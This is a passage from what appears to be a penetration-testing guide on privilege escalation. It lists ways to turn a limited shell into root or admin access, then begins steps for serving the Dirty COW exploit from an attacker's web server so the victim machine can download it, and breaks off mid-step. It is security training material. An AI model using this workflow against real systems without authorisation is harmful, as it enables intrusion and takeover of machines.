Privilege escalation
After exploiting a vulnerability, most of the time, you will get a limited shell. The next step is to get an admin account on the victim machine. To accomplish this, you will need to choose one of the following methodologies:
- Transfer a file to the victim machine to allow you to have a root shell (for example, Dirty COW)
- Copy–pasting a PowerShell payload for Windows OS (for example, Empire PowerShell)
- Using Metasploit/Meterpreter to escalate the privileges (refer to Appendix B)
- Manually searching for misconfigured parameters in order to get an admin/root shell
File transfers
Let's look at a practical scenario. Say you just got a limited shell into the victim's machine. You know that the OS is Linux and you want to upload Dirty COW
to the remote server to execute it. Here are the steps for this method:
- Copy the
Dirty COW
binary into the target HTTP directory located at/var/www/html
. - Start the web server using
$service apache2 start
. - Download the file to the victim's machine...